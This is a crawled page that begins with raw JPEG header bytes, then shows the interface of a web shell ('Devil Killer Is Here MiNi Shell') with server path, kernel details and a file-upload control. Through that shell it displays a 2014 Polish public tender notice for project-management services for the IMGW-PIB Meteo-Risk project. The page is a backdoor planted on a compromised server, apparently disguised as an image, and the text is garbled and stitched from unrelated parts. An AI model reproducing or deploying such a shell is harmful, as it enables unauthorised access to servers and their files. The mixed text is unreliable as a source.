JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141216/411814-N-2014.html

<p class="kh_header"><b>Warszawa: Obsługa organizacyjno-prawna Projektu Meteo-Risk</b><br>
<b>Numer ogłoszenia: 411814 - 2014; data zamieszczenia: 16.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Meteorologii i Gospodarki Wodnej - Państwowy Instytut Badawczy , ul. Podleśna 61, 01-673 Warszawa, woj. mazowieckie, tel. 22 5694230, 5694416, 5694263, faks 22 5694415.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowy instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa organizacyjno-prawna Projektu Meteo-Risk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1)	obsługę organizacyjno-prawną wdrożenia Projektu, w szczególności opracowanie i wdrożenie procedur w zakresie:
a)	realizacji Projektu,
b)	rozliczania i raportowania wydatków w Projekcie,
2)	zarządzanie realizacją Projektu, w szczególności:
a)	opracowanie i przedstawienie do zatwierdzenia przez Zamawiającego Dokumentu Inicjującego Projekt oraz dokumentów określających strukturę organizacyjną Projektu oraz zasady komunikacji i podejmowania decyzji w Projekcie,
b)	zorganizowanie i prowadzenie biura Projektu,
c)	nadzorowanie zgodności realizacji Projektu z opracowanymi harmonogramami,
d)	przygotowywanie wystąpień do Instytucji Wdrażającej-Instytucji Pośredniczącej o wyrażenie zgody na zmiany harmonogramów rzeczowo-finansowych Projektu, zgłaszanie zmian niewymagających aneksowania,
e)	opracowywanie aneksów do umowy o dofinansowanie wraz ze zmodyfikowanymi harmonogramami rzeczowo-finansowymi zadań i całego Projektu w przypadku zmian,
f)	nadzór i kontrola procesów projektowania, realizacji i wdrożenia rozwiązań Projektu, monitoringu postępu prac, raportowania oraz sporządzenia sprawozdań i wniosków o płatność,
g)	utrzymywanie stałego kontaktu z Instytucją Wdrażającą-Instytucją Pośredniczącą i wyjaśnianie bieżących problemów,
3)	wsparcie Zamawiającego przy wyborze wykonawców zadań, zgodnie z Harmonogramem zadań, stanowiącym Załącznik nr 1 do Umowy, w szczególności:
a)	przygotowywanie dokumentacji do wszczęcia postępowania o udzielenie zamówienia publicznego obejmujące: wsparcie pracowników Zamawiającego przy przygotowaniu opisu przedmiotu zamówienia, oszacowanie wartości zamówienia, opracowanie propozycji kryteriów oceny ofert i warunków podmiotowych udziału w postępowaniu,
b)	wsparcie Zamawiającego podczas postępowania przetargowego zmierzającego do wyłonienia wykonawców (w tym wsparcie przy udzielaniu odpowiedzi na pytania oferentów), a w przypadku postępowania odwoławczego przed Krajową Izbą Odwoławczą oraz postępowania sądowego prowadzonego na skutek wniesienia skargi na orzeczenie Izby zapewnienie reprezentacji Zamawiającego przez pełnomocnika, opracowanie odpowiedzi na odwołanie, a w razie potrzeby - opracowanie skargi na orzeczenie Izby i innych dokumentów niezbędnych w postępowaniu, 
4)	rozliczanie Projektu, w szczególności:
a)	sporządzanie wymaganych w umowie o dofinansowanie raportów rzeczowo-finansowych z postępu w realizacji Projektu oraz wniosków o płatność w określonych w umowie o dofinansowanie terminach i formach na podstawie danych rzeczowo-finansowych przekazywanych przez Zamawiającego,
b)	nadzór nad kompletowaniem dokumentacji finansowej potwierdzającej poniesienie wydatków u Zamawiającego oraz innych wymaganych informacji sprawozdawczych,
c)	konsultacje dla pracowników Zamawiającego w kwestiach związanych z rozliczaniem Projektu,
d)	czynny udział w kontrolach Projektu, przeprowadzanych przez instytucje nadzorujące wykorzystanie środków unijnych, w tym dokonywanie pokontrolnych korekt raportów/wniosków o płatność,
5)	rozliczanie wydatków Zamawiającego w ramach Projektu, w szczególności:
a)	opracowanie i zaproponowanie Zamawiającemu sposobu zorganizowania pracy Zespołu Projektowego u Zamawiającego (dalej: Zespół), w szczególności:
i.	określenie zakresów obowiązków członków Zespołu, 
ii.	przygotowanie odpowiednich upoważnień, oświadczeń, wniosków 
o aneksy do umów o pracę i umów cywilno-prawnych dla osób uczestniczących w realizacji Projektu, 
iii.	zorganizowanie sprawnego systemu zbierania i akceptowania kart czasu,
b)	przygotowanie propozycji dla Działu Finansowo-Księgowego Zamawiającego, dotyczącej księgowania wynagrodzeń i wydatków w Projekcie oraz kontrola poprawności ich rozliczania,
c)	rozliczenie końcowe Projektu i przygotowanie raportu końcowego,
6)	podejmowanie innych działań związanych z zapewnieniem jakości realizacji Projektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-3, 72.24.00.00-9, 79.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w wysokości 10000 zł )dziesięć tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada doświadczenie polegające na należytym wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
i.	 jednej usługi doradczej o wartości minimum  500 000,00 PLN brutto i czasie trwania dłuższym niż 1 rok, obejmującej wsparcie merytoryczne i metodyczne Kierownika Projektu i Biura Projektu, w projekcie, gdzie jednym z zadań była budowa systemu informatycznego z elementami systemu informacji przestrzennej, o budżecie projektu powyżej 20 000 000,00 PLN brutto, 
ii.	jednej usługi doradczej obejmującej wsparcie w zakresie organizacji i zarządzania projektem, w tym merytorycznej kontroli jakości działań w projekcie o budżecie powyżej 5 000 000 PLN brutto (słownie: pięć milionów złotych);
iii.	jednej usługi doradczej o wartości minimum 100 000,00 PLN brutto obejmującej wsparcie merytoryczne przy projekcie, polegające na opracowaniu koncepcji integracji systemów informatycznych,
iv.	jednej usługi w zakresie wsparcia rozliczania i raportowania projektu o budżecie nie mniejszym, niż 20 000 000,00 PLN, współfinansowanego z Funduszy Strukturalnych UE.
v.	3 usług doradczych o wartości minimum 100 000,00 PLN brutto każda polegających na opracowaniu dokumentacji przetargowej wraz ze wsparciem doradczym przy przeprowadzeniu postępowania, dla projektów o budżecie powyżej 5 000 000 PLN brutto.

Uwaga: 
Wyżej wymienione usługi mogą być wykonane w ramach jednego lub odrębnych zamówień.
W przypadku, gdy przedmiotem zamówienia są świadczenia okresowe lub ciągłe, Zamawiający dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi wypełniać wymogi określone przez Zamawiającego w warunku. W przypadku usług wykonywanych, Wykonawca zobowiązany jest na dzień składania ofert, na potwierdzenie spełnienia warunku określić zakres usługi wykonanej w ramach całego zamówienia. 
W przypadku wartości usługi określonej w walucie innej niż PLN, Wykonawca dokona przeliczenia na PLN według kursu średniego NBP (tabela A) na dzień zakończenia tej usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami: 
a.	Kierownik projektu - minimum 1 osoba posiadająca następujące kwalifikacje i doświadczenie zawodowe:
i.	posiada wyższe wykształcenie,
ii.	posiada certyfikat z metodyki zarządzania projektami Prince2 Practitioner  lub równoważny; 
Za certyfikat równoważny Zamawiający uzna certyfikaty przyznawane przez Project Management Institute (PMI), co najmniej na poziomie Project Management Professional (PMP) lub certyfikaty nadawane przez International Project Management Association (IPMA), co najmniej na poziomie C.
iii.	w okresie ostatnich 3 lat przed upływem terminu składania ofert przygotowywał i utrzymywał dokumentację, która stanowi zbiór reguł i zasad postępowania, stanowiący spójne pojęciowo podejście do wykonywania i zarządzania projektem oraz umożliwia adaptację do specjalnych potrzeb organizacji oraz  projektu, dla co najmniej jednego projektu
iv.	w okresie ostatnich 3 lat przed  upływem terminu składania ofert pełnił funkcję kierownika projektu w co najmniej jednej usłudze, polegającej na przygotowywaniu dokumentacji przetargowej wraz ze wsparciem doradczym przy przeprowadzeniu postępowania o udzielenie zamówienia publicznego,
v.	w okresie ostatnich 3 lat przed upływem terminu składania ofert pełnił funkcję kierownika projektu w co najmniej jednym projekcie budowy i wdrożenia systemu informatycznego w architekturze SOA (odebranym i przekazanym do utrzymania), o wartości projektu nie mniejszej, niż 1 000 000,00 PLN brutto, 
vi.	w okresie ostatnich 3 lat przed upływem terminu składania ofert pełnił funkcję kierownika projektu w co najmniej jednej usłudze świadczenia wsparcia doradczego dla projektu polegającego na  zaprojektowania i wdrożeniu systemu informatycznego z elementami GIS, o wartości brutto projektu nie mniejszej niż 1 000 000,00 PLN (jeden milion zł).

b.	Ekspert ds. wsparcia projektów - minimum 1 osoba posiadająca następujące kwalifikacje i doświadczenie zawodowe:
i.	posiada wyższe wykształcenie, 
ii.	posiada certyfikat z metodyki zarządzania projektami Prince2 lub równoważny; 
Za certyfikat równoważny Zamawiający uzna certyfikaty przyznawane przez Project Management Institute (PMI), co najmniej na poziomie Project Management Professional (PMP) lub certyfikaty nadawane przez International Project Management Association (IPMA), co najmniej na poziomie C.
iii.	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadził biuro projektu (raportowanie, sprawozdawczość, organizacja spotkań, kontakty z uczestnikami projektu), 
iv.	w okresie ostatnich 3 lat przed upływem terminu składania ofert był odpowiedzialny za zarządzanie zakresem projektu i jego zmianami,
v.	w okresie ostatnich 3 lat przed upływem terminu składania ofert pełnił funkcję kierownika projektu w co najmniej jednej usłudze świadczenia wsparcia doradczego dla projektu polegającego na  zaprojektowania i wdrożeniu systemu informatycznego z elementami GIS, o wartości projektu nie mniejszej, niż 500 000,00 PLN brutto.

c.	Architekt IT - minimum 1 osoba posiadająca następujące kwalifikacje i doświadczenie zawodowe:
i.	wykształcenie wyższe
ii.	w ciągu ostatnich 10 lat przed upływem terminu składania ofert zrealizował co najmniej 5 zadań polegających na  tworzeniu architektury systemów,
iii.	posiada znajomość framework TOGAF 8 lub 9 lub równoważnego; 
Za certyfikat równoważny Zamawiający uzna certyfikat wystawiony przez międzynarodową organizację certyfikującą potwierdzający umiejętności i wiedzę z zakresu: kompleksowe podejście do projektowania, planowania, implementacji oraz zarządzania informacyjną architekturą organizacji;
iv.	w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonał co najmniej 2 usługi obejmujące modelowanie systemu w języku  UML 2.0.
v.	w okresie ostatnich 3 lat przed upływem terminu składania ofert pełnił funkcję architekta lub specjalisty ds. architektury w co najmniej jednej usłudze polegającej na przygotowaniu dokumentacji przetargowej wraz ze wsparciem doradczym przy przeprowadzeniu postępowania o udzielenie zamówienia publicznego,
vi.	w okresie ostatnich 3 lat przed upływem terminu składania ofert zrealizował co najmniej 1 zadanie polegające na projektowaniu (tworzeniu) systemów informatycznych zorientowanych na usługi (SOA) i wykorzystujących bazy danych,
vii.	w okresie ostatnich 3 lat przed upływem  terminu składania ofert brał udział w realizacji co najmniej jednej usługi w zakresie projektowania (tworzenia) architektury systemu informatycznego, którego elementem były systemy GIS,

d.	Ekspert GIS - minimum 1 osoba posiadająca następujące kwalifikacje i doświadczenie zawodowe:
i.	posiada wyższe wykształcenie,
ii.	posiada znajomość przepisów dotyczących infrastruktury informacji przestrzennej, w tym m.in. ustawy z dnia 4 marca 2010 r. o infrastrukturze informacji przestrzennej (Dz.U.2010.76.489)oraz Dyrektywy (2007/2/WE)z  dnia 14 marca 2007 r. ustanawiającej infrastrukturę informacji przestrzennej we Wspólnocie Europejskiej (INSPIRE) (Dz.U.UE.L.2007.108.1) wraz z aktami wykonawczymi,
iii.	w okresie ostatnich 3 lat przed upływem terminu składania ofert brał udział w co najmniej jednej usłudze związanej z przygotowaniem zbiorów danych zgodnych ze specyfikacjami zgodnymi z INSPIRE, 
iv.	w okresie ostatnich 3 lat przed upływem  terminu składania ofert brał udział w co najmniej jednym projekcie, polegającym na zaprojektowaniu i wdrażaniu systemu informatycznego w architekturze SOA,
v.	w okresie ostatnich 3 lat przed upływem terminu składania ofert brał udział w co najmniej jednym projekcie informatycznym polegającym na zaprojektowaniu i wdrożeniu systemu, którego jednym z elementów była funkcjonalność GIS obejmująca udostępnienie usługi wyszukiwania, przeglądania i pobierania w rozumieniu usług opisanych w ustawie o infrastrukturze informacji przestrzennej; 

e.	Analityk - minimum 1 osoba posiadająca następujące kwalifikacje i doświadczenie zawodowe 
i.	posiada wykształcenie wyższe,
ii.	w okresie ostatnich 5 lat przed upływem terminu składania ofert brał udział w realizacji co najmniej trzech usług w zakresie: analizy procesów biznesowych, opracowywania modelu danych z modelem przepływu danych pomiędzy systemami, zbierania i specyfikacji wymagań funkcjonalnych i niefunkcjonalnych dla systemów informatycznych, identyfikowania założeń i ograniczeń systemowych,
iii.	Posiada certyfikat REQB Certified Professional for Requirements Engineering Foundation Level lub REQB Advanced Level Requirements Manager lub inny równoważny. Przez dokument  równoważny należy rozumieć certyfikat wystawiony przez międzynarodową organizację certyfikującą potwierdzający umiejętności i wiedzę z zakresu  pozyskiwania, specyfikowania oraz zarządzania wymaganiami dla systemów informatycznych.
iv.	w okresie ostatnich 5 lat przed upływem terminu składania ofert zbierał i specyfikował - w co najmniej jednej usłudze, z zastosowaniem języka UML - wymagania do systemu informatycznego wykorzystującego urządzenia mobilne (np. smartfony, tablety), 
Wyżej wymienione wymagania mogą być spełnione łącznie przez jedną lub dwie osoby.

f.	Ekspert ds. aplikacji mobilnych
i.	posiada wyższe wykształcenie techniczne,
ii.	w okresie  3 lat przed terminem składania ofert brał udział jako project manager lub architekt lub developer w co najmniej 2 projektach informatycznych (jeden na platformę Android, drugi na platformę IOS), polegających na przygotowaniu i rozwoju aplikacji na urządzenia mobilne tj. tablety lub smartfony, 

g.	Ekspert ds. Zamówień Publicznych
i.	posiada wykształcenie wyższe prawnicze,
ii.	w okresie 3 lat przed terminem składania ofert brał udział w realizacji co najmniej trzech usług polegających na przygotowywaniu i udziale w przeprowadzeniu postępowań o udzielenie zamówienia publicznego (powyżej progu unijnego) zakończonych zawarciem umowy, 
iii.	w okresie ostatnich 3 lat przed upływem terminu składania ofert opracował co najmniej 3 opinie prawne oraz udzielał porad prawnych co najmniej 3 zamawiającym przy udzielaniu zamówień w zakresie IT. 
iv.	W okresie ostatnich 3 lat przed upływem  terminu składania ofert reprezentował co najmniej 2 zamawiających przed KIO lub zespołem arbitrów UZP w sporach  dotyczących zamówień publicznych. 
h.	Ekspert ds. Rozliczeń
i.	posiada wykształcenie wyższe ekonomiczne,
ii.	odbył certyfikowane szkolenie lub ukończył studia podyplomowe w zakresie prowadzenia i rozliczania projektów finansowanych ze środków europejskich,
iii.	posiada doświadczenie w zakresie rozliczania co najmniej 3 projektów współfinansowanych ze środków europejskich, o wartości co najmniej 
500 000 zł każdy,
i.	posiada doświadczenie w zakresie sporządzania wniosków o dofinansowanie projektów współfinansowanych ze środków europejskich, to jest przygotowywał co najmniej 5 wniosków na projekty o wartości co najmniej 1 000 000 zł każdy.

i.	Ekspert ds. Bezpieczeństwa i Ciągłości działania
i.	posiada wykształcenie wyższe,
ii.	ukończył certyfikowane szkolenie na audytora wiodącego systemu zarządzania bezpieczeństwem informacji wg ISO 27001 lub CISA,
iii.	ukończył certyfikowane szkolenie na pełnomocnika ds. zarządzania ryzykiem wg ISO 31000,
iv.	uczestniczył w realizacji co najmniej jednego projektu  dotyczącego zarządzania ciągłością działania o wartości co najmniej 5 000 000 zł brutto,
v.	posiada doświadczenie w realizacji projektów dotyczących zarządzania ryzykiem lub bezpieczeństwem informacji, to jest był członkiem zespołu realizującego co najmniej jeden taki projekt o wartości co najmniej 1 000 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Koncepcja Organizacji Realizacji Projektu - opracowanie, sporządzone na podstawie założeń, zawartych w Biznes Planie Projektu, stanowiącego Załącznik nr 10 do SIWZ, zawierające minimum opis następujących obszarów:
-Strategia zarządzania - zarys metodyki realizacji przedmiotu zamówienia. Wykaz działań uważanych za niezbędne do osiągnięcia celów i oczekiwanych rezultatów. Powiązanie działań z wynikami oraz charakterem Projektu;
- Harmonogram działań - zadania wraz z proponowanymi terminami ich rozpoczęcia, kolejnością, zależnościami pomiędzy zadaniami oraz czasem trwania proponowanych działań. Proponowane działania muszą uwzględniać okres mobilizacji projektu. Plan musi zawierać główne etapy realizacji przedmiotu zamówienia z uwzględnieniem czasu ich trwania, czasu pracy ekspertów na poszczególnych etapach oraz produktów poszczególnych etapów;
- Określenie i opis zasad techniki zarządzania ryzykiem - obejmujący co najmniej zarys sposobu zarządzaniem ryzykiem, a w szczególności identyfikację ryzyka, analizę ryzyka, planowanie reakcji na ryzyko, monitorowanie i kontrolę ryzyka oraz prowadzenie dokumentacji związanej z zarządzaniem ryzykiem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 35</li>
<li>2 - Koncepcja Organizacji Realizacji Projektu, w tym podkryt. Strat. zarządz. 25%, Harmon.działań 20%, Określ. i opis zasad techniki zarz.ryzykiem 20% - 65</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień Umowy w stosunku do treści Umowy w sytuacji gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, a w szczególności pojawienia się:

1)	zmian lub wejścia w życie przepisów prawa polskiego w zakresie realizowanych usług, 
